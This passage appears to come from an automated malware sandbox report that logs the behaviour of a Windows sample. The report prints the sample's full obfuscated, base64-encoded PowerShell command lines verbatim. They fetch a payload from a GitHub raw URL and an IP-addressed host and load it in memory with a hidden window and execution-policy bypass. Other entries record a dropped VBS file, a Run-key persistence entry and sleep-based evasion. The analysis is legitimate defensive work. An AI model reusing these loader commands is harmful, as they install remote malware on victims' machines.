zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BA18166 push esp; iretd 3_2_00007FFD9BA1816C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BA17545 push ebx; iretd 3_2_00007FFD9BA1756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BA11520 push eax; ret 3_2_00007FFD9BA1154D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAE236C push 8B485F92h; iretd 3_2_00007FFD9BAE2371
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAE23BE push 8B485F92h; iretd 3_2_00007FFD9BAE23C6

Persistence and Installation Behavior

barindex
Command shell drops VBS files
Source: C:\Windows\System32\cmd.exeFile created: C:\ProgramData\autopatia.vbsJump to behavior

Boot Survival

barindex
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\autopatia.vbsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1747Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1558Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3651Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6083Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep count: 3651 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep count: 6083 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep time: -19369081277395017s >= -30000sJump to behavior
